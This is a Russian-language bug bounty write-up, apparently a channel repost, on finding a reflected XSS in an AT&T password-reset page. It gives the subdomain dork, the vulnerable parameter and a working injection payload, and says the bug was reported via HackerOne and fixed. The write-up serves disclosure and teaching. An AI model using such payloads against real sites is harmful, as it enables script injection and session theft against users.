Отраженный XSS в AT&T

Отраженный XSS в AT&T

SHADOW:Group
Эта статья носит исключительно образовательный характер. Автор не несет ответственности за любые последствия ее прочтения.

Привет! Сегодня я хочу поделиться тем, как была найдена XSS в AT&T. Повествование ведётся со слов автора.

Ищем поддомены с помощью Google дорка:

site:*.att.com

и начинаем смотреть все полученные результаты.

При посещении ilm.att.com

https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl=https://ilm.att.com

Он перенаправляет на:

https://ilm.att.com/bizportal/spp#/forgotPassword

Я проверяю исходный код и замечаю переменную jsloginUrl:

var jsuserName = '';
var jsloginUrl = 'https://ilm.att.com';

в которой находится значение параметра loginUrl. Пробуем поменять значение параметра. Выполняем:

https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl='"></;

и видим в исходном коде:

var jsuserName = '';
var jsloginUrl = ''"></;';

Все в порядке. Теперь пробуем ввести полезную нагрузку для XSS:

https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl=x%27;alert(document.domain);x=%27

и полезная нагрузка успешно вводится в веб-страницу:

var jsuserName = '';
var jsloginUrl = 'x';alert(document.domain);x='';

В AT&T отправлен отчёт через hackerone. Через 4 месяца .... ошибка устранена. В качестве награды AT&T выплачивает 50$.

На этом все. Спасибо за просмотр!

Оригинал статьи на английском тут.

Подпишись на канал - @shadow_group_tg.


Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org